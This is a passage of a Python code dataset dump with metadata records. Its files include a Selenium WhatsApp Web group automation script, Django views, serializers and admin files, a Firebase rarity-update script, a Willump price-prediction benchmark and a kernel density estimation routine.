shouldreturnbrowser:\n return browser\n\n\ndef scrape_members_from_group(groupname, browser=None):\n members = []\n browser = open_session()\n inputbox = browser.find_element(By.CLASS_NAME, \"_3FRCZ\")\n inputbox.send_keys(groupname)\n sleep(5)\n inputbox.send_keys(Keys.TAB)\n sleep(3)\n 
browser.find_element(By.CSS_SELECTOR, \".DP7CM\").click()\n sleep(2)\n browser.find_element(By.CSS_SELECTOR, \"._3lS1C\").click()\n sleep(2)\n browser.find_element(By.CSS_SELECTOR, \"._3FRCZ\").click()\n sleep(1)\n preactive = None\n curractive = browser.switch_to.active_element\n while True:\n curractive.send_keys(Keys.ARROW_DOWN)\n curractive = browser.switch_to.active_element\n if curractive == preactive:\n break\n members.append(curractive.find_element(By.CSS_SELECTOR, \"._3ko75\").get_attribute('innerText'))\n preactive = curractive\n\n return members\n\ndef make_group_admins(groupname, members, browser=None):\n browser = open_session()\n inputbox = browser.find_element(By.CLASS_NAME, \"_3FRCZ\")\n inputbox.send_keys(groupname)\n sleep(5)\n inputbox.send_keys(Keys.TAB)\n sleep(3)\n browser.find_element(By.CSS_SELECTOR, \".DP7CM\").click()\n sleep(2)\n browser.find_element(By.CSS_SELECTOR, \"._3lS1C\").click()\n sleep(2)\n browser.find_element(By.CSS_SELECTOR, \"._3FRCZ\").click()\n sleep(1)\n preactive = None\n curractive = browser.switch_to.active_element\n while True:\n curractive.send_keys(Keys.ARROW_DOWN)\n sleep(1)\n curractive = browser.switch_to.active_element\n if curractive == preactive:\n break\n name = curractive.find_element(By.CSS_SELECTOR, \"._3ko75\").get_attribute('innerText')\n if name in members:\n try:\n curractive.find_element(By.CSS_SELECTOR, \".LwCwJ\")\n except:\n curractive.click()\n sleep(1)\n browser.find_element(By.CSS_SELECTOR, \".Ut_N0\").click()\n sleep(1)\n preactive = curractive\n sleep(3)\n\n# make_group_admins(\"yess\", [\"Navpreet Devpuri\", \"TiDdi\"])", "sub_path": "tithiwa/groups.py", "file_name": "groups.py", "file_ext": "py", "file_size_in_byte": 3316, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "session.open_session", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.TAB", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 29, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "session.open_session", "line_number": 43, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 44, "usage_type": "attribute"}, {"api_name": 
"selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.TAB", "line_number": 47, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 47, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 50, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 51, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 51, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 53, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 53, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.ARROW_DOWN", "line_number": 58, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 62, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 62, "usage_type": "name"}, {"api_name": "session.open_session", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 69, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 69, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.TAB", "line_number": 72, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 72, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 74, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 74, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 76, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 76, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 77, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 78, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.ARROW_DOWN", "line_number": 83, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 83, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 88, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 88, "usage_type": "name"}, {"api_name": 
"selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 91, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 91, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 95, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 95, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "554784592", "text": "# memorandi.location.serializers\n# Serialize the default models of the Location app\n#\n# Author: Benjamin Bengfort \n# Created: Wed Feb 12 00:31:21 2014 -0500\n#\n# Copyright (C) 2014 Bengfort.com\n# For license information, see LICENSE.txt\n#\n# ID: serializers.py [] benjamin@bengfort.com $\n\n\"\"\"\nSerialize the default models of the Location app\n\"\"\"\n\n##########################################################################\n## Imports\n##########################################################################\n\nfrom .models import *\nfrom rest_framework import serializers\n\n##########################################################################\n## Serializers\n##########################################################################\n\nclass LocationSerializer(serializers.HyperlinkedModelSerializer):\n\n region = serializers.RelatedField(source=\"region\")\n country = serializers.RelatedField(source=\"country\")\n\n class Meta:\n model = Location\n fields = ('id', 'url', 'name', 'address', 'city', 'region',\n 'country', 'postal_code', 'latitude', 'longitude', 'ipaddr')\n", "sub_path": "memorandi/location/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1131, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 27, "usage_type": "name"}, {"api_name": "rest_framework.serializers.RelatedField", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.serializers.RelatedField", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "426483336", "text": "import firebase_admin\nimport csv\nfrom firebase_admin import credentials, firestore\n\n\nif __name__ == \"__main__\":\n name = \"main\"\n\n cred = credentials.Certificate(\"./service-account.json\")\n firebase_app = firebase_admin.initialize_app(cred)\n\n db = firestore.client()\n\n artists_db = db.collection(\"artists\").stream()\n\n artists_array = []\n\n for artist in artists_db:\n artist_dict = artist.to_dict()\n artist_dict[\"uid\"] = artist.id\n artists_array.append(artist_dict)\n\n operators_array = []\n\n operators_db = db.collection(\"operators\").stream()\n\n for operator in operators_db:\n operator_dict = operator.to_dict()\n operator_dict[\"uid\"] = operator.id\n operators_array.append(operator_dict)\n\n failed_to_update = []\n\n with open('operator-rarity.csv', 'r', newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n for line in csv_reader:\n op_name = line[1]\n rarity = 
int(line[0].replace(\"*\", \"\"))\n\n print(op_name, rarity)\n\n operator = list(\n filter(lambda op: op[\"name\"] == op_name, operators_array))\n\n print(operator)\n if(len(operator) != 1):\n failed_to_update.append(op_name)\n print(\"Failed to update, adding to logs\")\n else:\n target_operator = operator[0] # the operator we want to update\n\n operator_id = target_operator[\"uid\"]\n print(operator_id)\n\n operator_ref = db.collection(\"operators\").document(operator_id)\n operator_ref.update({u\"rarity\": rarity})\n print(f\"successfully updated ${op_name}\")\n\n print(\"Failed to update the following:\")\n print(failed_to_update)\n", "sub_path": "update-operator-rarity.py", "file_name": "update-operator-rarity.py", "file_ext": "py", "file_size_in_byte": 1859, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "firebase_admin.credentials.Certificate", "line_number": 9, "usage_type": "call"}, {"api_name": "firebase_admin.credentials", "line_number": 9, "usage_type": "name"}, {"api_name": "firebase_admin.initialize_app", "line_number": 10, "usage_type": "call"}, {"api_name": "firebase_admin.firestore.client", "line_number": 12, "usage_type": "call"}, {"api_name": "firebase_admin.firestore", "line_number": 12, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 35, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 36, "usage_type": "attribute"}]} +{"seq_id": "207809426", "text": "# Original source: https://www.kaggle.com/lopuhin/mercari-golf-0-3875-cv-in-75-loc-1900-s\n# Data files can be found on Kaggle: https://www.kaggle.com/c/mercari-price-suggestion-challenge\n# They must be stripped of non-ascii characters as Willump does not yet support arbitrary Unicode.\n\n\nimport argparse\nimport pickle\nimport time\nfrom contextlib import contextmanager\nfrom operator import itemgetter\nfrom typing import List, Dict, Union\n\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse\nfrom keras.models import load_model\nfrom sklearn.model_selection import KFold\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import FunctionTransformer, StandardScaler\n\nimport price_utils\nfrom price_utils import *\nfrom willump.evaluation.willump_executor import willump_execute\n\nbase_folder = \"tests/test_resources/mercari_price_suggestion/\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-d\", \"--disable\", help=\"Disable Willump\", action=\"store_true\")\nargs = parser.parse_args()\n\n\n@contextmanager\ndef timer(name):\n t0 = time.time()\n yield\n print(f'[{name}] done in {time.time() - t0:.3f} s')\n\n\ndef preprocess(df: pd.DataFrame) -> pd.DataFrame:\n df['name'] = df['name'].fillna('') + ' ' + df['brand_name'].fillna('')\n df['text'] = (df['item_description'].fillna('') + ' ' + df['name'] + ' ' + df['category_name'].fillna(''))\n return df[['name', 'text', 'shipping', 'item_condition_id']]\n\n\ndef on_field(f: Union[str, List[str]], *vec) -> Pipeline:\n return make_pipeline(FunctionTransformer(itemgetter(f), validate=False), *vec)\n\n\ndef to_records(df: pd.DataFrame) -> List[Dict]:\n return df.to_dict(orient='records')\n\n\nmodel = load_model(base_folder + \"mercari_model.h5\")\n\n\n@willump_execute(disable=args.disable)\ndef predict_from_input(model_input, name_vectorizer, text_vectorizer, dict_vectorizer):\n model_input = preprocess(model_input)\n name_input = model_input[\"name\"].values\n name_vec = name_vectorizer.transform(name_input)\n 
text_input = model_input[\"text\"].values\n text_vec = text_vectorizer.transform(text_input)\n valid_records = to_records(model_input[[\"shipping\", \"item_condition_id\"]])\n dict_vec = dict_vectorizer.transform(valid_records)\n combined_vec = scipy.sparse.hstack([name_vec, dict_vec, text_vec], format=\"csr\")\n preds = willump_predict_function(model, combined_vec)\n return preds\n\n\ndef main():\n y_scaler = StandardScaler()\n train = pd.read_table(base_folder + 'train.tsv')\n train = train[train['price'] > 0].reset_index(drop=True)\n cv = KFold(n_splits=5, shuffle=True, random_state=42)\n train_ids, valid_ids = next(cv.split(train))\n train, valid = train.iloc[train_ids], train.iloc[valid_ids]\n y_scaler.fit_transform(np.log1p(train['price'].values.reshape(-1, 1)))\n price_utils.y_scaler = y_scaler\n y_true = valid['price'].values\n y_true = y_scaler.transform(np.log1p(y_true.reshape(-1, 1)))\n vectorizers = pickle.load(open(base_folder + \"mercari_vect_lr.pk\", \"rb\"))\n mini_valid = valid.iloc[0:3].copy()\n predict_from_input(mini_valid, *vectorizers).astype(np.float32)\n predict_from_input(mini_valid, *vectorizers).astype(np.float32)\n t0 = time.time()\n y_pred = predict_from_input(valid, *vectorizers).astype(np.float32)\n time_elapsed = time.time() - t0\n print(\"Time: %f Length: %d Throughput: %f\" % (time_elapsed, len(valid), len(valid) / time_elapsed))\n print('Valid 1 - RMSLE: {:.7f}'.format(willump_score_function(y_true, y_pred)))\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tests/benchmark_scripts/price_batch.py", "file_name": "price_batch.py", "file_ext": "py", "file_size_in_byte": 3546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}, {"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 32, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.FunctionTransformer", "line_number": 46, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 45, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 49, "usage_type": "name"}, {"api_name": "keras.models.load_model", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse.hstack", "line_number": 65, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 65, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 65, "usage_type": "name"}, {"api_name": "willump.evaluation.willump_executor.willump_execute", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 74, "usage_type": "call"}, {"api_name": 
"numpy.log1p", "line_number": 77, "usage_type": "call"}, {"api_name": "price_utils.y_scaler", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.log1p", "line_number": 80, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 84, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 86, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "589838930", "text": "from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.views import View\n\nfrom .forms import StudentForm\nfrom .models import Student\n\n#分离get,post的处理逻辑\n\nclass IndexView(View):\n template_name = 'index.html'\n\n def get_context(self):\n students =Student.get_all()\n context = {\n 'students':students,\n }\n return context\n\n def get(self,request):\n context = self.get_context()\n form =StudentForm()\n context.update({\n 'form':form\n })\n return render(request,self.template_name,context=context)\n\n def post(self,request):\n form = StudentForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('index'))\n context = self.get_context()\n context.update({\n 'form':form\n })\n return render(request,self.template_name,context=context)\n\n def test_get_index(self):\n #测试首页的可用性\n client = Client()\n response = client.get('/')\n self.assertEqual(response.status_code,200,'status code must be 200!')\n def test_post_student(self):\n client = Client()\n data = dict(\n name='test_post',\n sex=1,\n email='333@dd.com',\n profession=\"程序员\",\n qq='3333',\n phone = '3222',\n )\n response = client.post('/',data)\n self.assertEqual(response.status_code,302,'status code must be 302!')\n\n response = client.get('/')\n self.assertTure(b'test_for_post' in response.content,\n 'response content must contain \"test_for_post\"')\n# def index(request):\n# # words = 'World!'\n# #return render(request, 'index.html', context={\"words\":words})\n# students = Student.get_all()\n# #students = Student.objects_all()\n# if request.method == 'POST':\n# form = StudentForm(request.POST)\n# if form.is_valid():\n# # cleaned_data = form.cleaned_data\n# # student = Student()\n# # student.name = cleaned_data['name']\n# # student.sex = cleaned_data['sex']\n# # student.email = cleaned_data['profession']\n# # student.qq = cleaned_data['qq']\n# # student.phone = cleaned_data['phone']\n# form.save()\n# return HttpResponseRedirect(reverse('index'))\n# else:\n# form = StudentForm()\n#\n# context = {\n# 'students': students,\n# 'form': form,\n# }\n# return render(request, \"index.html\", context=context)", "sub_path": "student/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.views.View", "line_number": 11, "usage_type": "name"}, {"api_name": "models.Student.get_all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Student", "line_number": 15, "usage_type": "name"}, {"api_name": "forms.StudentForm", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "forms.StudentForm", "line_number": 
30, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "401434924", "text": "from django.contrib import admin\n\nfrom blogging.models import Post, Category\n\n# Register your models here.\n\nclass CategoryInlineAdmin(admin.TabularInline):\n\n model = Category.posts.through\n extra = 1\n\nclass PostAdmin(admin.ModelAdmin):\n\n inlines = [CategoryInlineAdmin, ]\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n\n exclude = ('posts', )\n\n\nadmin.site.register(Post, PostAdmin)\nadmin.site.register(Category, CategoryAdmin)\n\n# Note: I found the similar example on this website: https://cewing.github.io/training.codefellows/lectures/day27/django_admin.html\n", "sub_path": "mysite/blogging/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.contrib.admin.TabularInline", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "blogging.models.Category.posts", "line_number": 9, "usage_type": "attribute"}, {"api_name": "blogging.models.Category", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 17, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 22, "usage_type": "call"}, {"api_name": "blogging.models.Post", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 23, "usage_type": "call"}, {"api_name": "blogging.models.Category", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "490226107", "text": "# y, t, optw, W, C, y95b, y95u, yb = KDERB(spike_times)\n\n# Function KDERB returns an optimized kernel density estimate using a Gauss kernel function.\n\n# Input arguments:\n# spike_times: sample data list or array.\n# Output arguments:\n# y: Estimated density\n# t: Points at which estimation was computed.\n# The same as tin if tin is provided.\n# (If the sampling resolution of tin is smaller than the sampling\n# resolution of the data, spike_times, the estimation was done at\n# smaller number of points than t. 
The results, t and y, are obtained\n# by interpolating the low resolution sampling points.)\n# optw:\n# Optimal kernel bandwidth.\n\n# Optimization principle:\n# The optimal bandwidth is obtained as a minimizer of the formula,\n# sum_{i, j} \\int k(x - x_i) k(x - x_j) dx - 2 sum_{i~=j} k(x_i - x_j),\n# where k(x) is the kernel function, according to\n\n# Hideaki Shimazaki and Shigeru Shinomoto\n# Kernel Bandwidth Optimization in Spike Rate Estimation\n# Journal of Computational Neuroscience 2010\n# http://dx.doi.org/10.1007/s10827-009-0180-4\n\n# The above optimization is based on a principle of minimizing\n# expected L2 loss function between the kernel estimate and an\n# unknown underlying density function. An assumption is merely\n# that samples are drawn from the density independently each other.\n\n# For more information, please visit\n# http://2000.jukuin.keio.ac.jp/shimazaki/res/kernel.html\n\n# See also SSVKERNEL, SSHIST, sskernel\n\n# Hideaki Shimazaki\n# http://2000.jukuin.keio.ac.jp/Shimazaki\n\n# (New correction in version 1)\n# y-axis was multiplied by the number of data, so that\n# y is a time hisogram representing the density of spikes.\n\n#\n# KDERB_rate_v2.py and KDERB_rate_v3.py\n# Junpei Naito 2017/11/14\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport numpy.fft as fft\nimport math\nimport time\n\n\ndef KDERB(spike_times) :\n start = time.time()\n spike_times = np.array(sorted(spike_times))\n max_value = max(spike_times)\n min_value = min(spike_times)\n T = max_value - min_value\n\n diff_spike = np.array(sorted(np.diff(spike_times)))\n dt_samp = diff_spike[np.nonzero(diff_spike)][0]\n \n tin = np.linspace(min_value, max_value, min(math.ceil(T / dt_samp), 1e3))\n spike_ab = spike_times[np.nonzero((spike_times >= min(tin)) * (spike_times <= max(tin)))]\n\n dt = min(np.diff(tin))\n\n y_hist = np.histogram(spike_ab, np.append(tin, max_value) - dt / 2)[0]\n L = len(y_hist)\n N = sum(y_hist)\n y_hist = y_hist / (N * dt)\n\n Wmin = 2 * dt\n Wmax = 1 * (max_value - min_value)\n\n tol = 1e-5\n phi = (math.sqrt(5) + 1) / 2\n\n a = ilogexp(Wmin)\n b = ilogexp(Wmax)\n\n c1 = (phi - 1) * a + (2 - phi) * b\n c2 = (2 - phi) * a + (phi - 1) * b\n\n f1 = CostFunction(y_hist, N, logexp(c1), dt)[0]\n f2 = CostFunction(y_hist, N, logexp(c2), dt)[0]\n\n k = 0\n W = [0] * 20\n C = [0] * 20\n\n #------------- revision in version 2 (2017/11/24) \n # repeat 20 times if c1+c2 < (difference between a and b)\n #------------- \n\n while(abs(b - a) > tol * (abs(c1) + abs(c2)) and k < 20) :\n if(f1 < f2) :\n b = c2\n c2 = c1\n\n c1 = (phi - 1) * a + (2 - phi) * b\n\n f2 = f1\n f1, yh1 = CostFunction(y_hist, N, logexp(c1), dt)\n\n W[k] = logexp(c1)\n C[k] = f1\n optw = logexp(c1)\n y = yh1 / sum(yh1 * dt)\n else :\n a = c1\n c1 = c2\n\n c2 = (2 - phi) * a + (phi - 1) * b\n\n f1 = f2\n f2, yh2 = CostFunction(y_hist, N, logexp(c2), dt)\n\n W[k] = logexp(c2)\n C[k] = f2\n optw = logexp(c2)\n y = yh2 / sum(yh2 * dt)\n\n k += 1\n\n y = y * len(spike_times)\n\n end = time.time()\n print(end - start)\n\n drawKDERB(y, tin)\n return y, tin, optw\n \ndef sort(mat) :\n N = len(mat[0])\n for i in range(0, N) :\n mat[:, i] = sorted(mat[:, i])\n\n return mat\n\ndef logexp(x) :\n if x < 1e2 :\n return math.log(1 + math.exp(x))\n if x >= 1e2 :\n return x\n\ndef ilogexp(x) :\n if x < 1e2 :\n return math.log(math.exp(x) - 1)\n if x >= 1e2 :\n return x\n\n \n\ndef CostFunction(y_hist, N, w, dt) :\n yh = fftkernel(list(y_hist), w / dt) # density\n halflen = math.ceil(len(y_hist) / 2)\n remlen = len(y_hist) - 
halflen\n addleft = fftkernel(list(np.r_[np.zeros(remlen), y_hist[0:halflen]]), w / dt)\n addright = fftkernel(list(np.r_[y_hist[halflen : len(y_hist)], np.zeros(remlen)]), w / dt)\n\n # formula for density\n C = sum(yh * yh) * dt - 2 * sum(yh * y_hist) * dt + 2 * 1 / (math.sqrt(2 * math.pi) * w * N)\n C *= N * N\n\n yh = yh + np.r_[np.fliplr([addleft[0:halflen]])[0], np.zeros(remlen)] + np.r_[np.zeros(remlen), np.fliplr([addright[halflen:len(addright)]])[0]]\n \n return C, yh\n\ndef fftkernel(x, w) :\n # y = fftkernel(x, w)\n # \n # Function `fftkernel' applies the Gauss kernel smoother to an input signal using FFT algorithm.\n #\n # Input argument\n # x : Sample signal vector\n # w : Kernel bandwidth (the standard deviation) in unit of the sampling resolution of x.\n # Output argument\n # y : Smoothed signal.\n #\n # MAY 5 / 23, 2012 Author Hideaki Shimazaki\n # RIKEN Brain Science Institute\n # http://2000.jukuin.keio.ac.jp/shimazaki\n # \n # (New correction in version 1)\n # y-axis was multiplied by the number of data, so that\n # y is a time histogram representing the density of spikes.\n\n L = len(x)\n Lmax = max(1.0, math.floor(L + 3.0 * w))\n n = int(2 ** (nextpow2(Lmax)))\n\n X = fft.fft(x, n)\n\n f = (np.array(range(0, n)) + 0.0) / n\n f = np.r_[-f[range(0, int(n / 2) + 1)], f[range(int(n / 2) - 1, 0, -1)]]\n\n K = np.exp(-0.5 * ((w * 2 * math.pi * f) ** 2))\n\n y = fft.ifft(X * K, n)\n\n y = y[0:L]\n\n return y\n\ndef nextpow2(n) :\n if (n < 0) :\n return 0\n else :\n m = int(math.ceil(math.log2(n)))\n\n return m\n \ndef drawKDERB(y, t) :\n plt.stackplot(t, y)\n plt.ylim(ymin = 0)\n plt.show()\n", "sub_path": "old_files/KDERB_rate_v3.py", "file_name": "KDERB_rate_v3.py", "file_ext": "py", "file_size_in_byte": 6060, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 66, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 71, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 131, "usage_type": "call"}, {"api_name": "math.log", "line_number": 146, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 146, "usage_type": "call"}, {"api_name": "math.log", "line_number": 152, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 152, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 166, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 166, "usage_type": "attribute"}, 
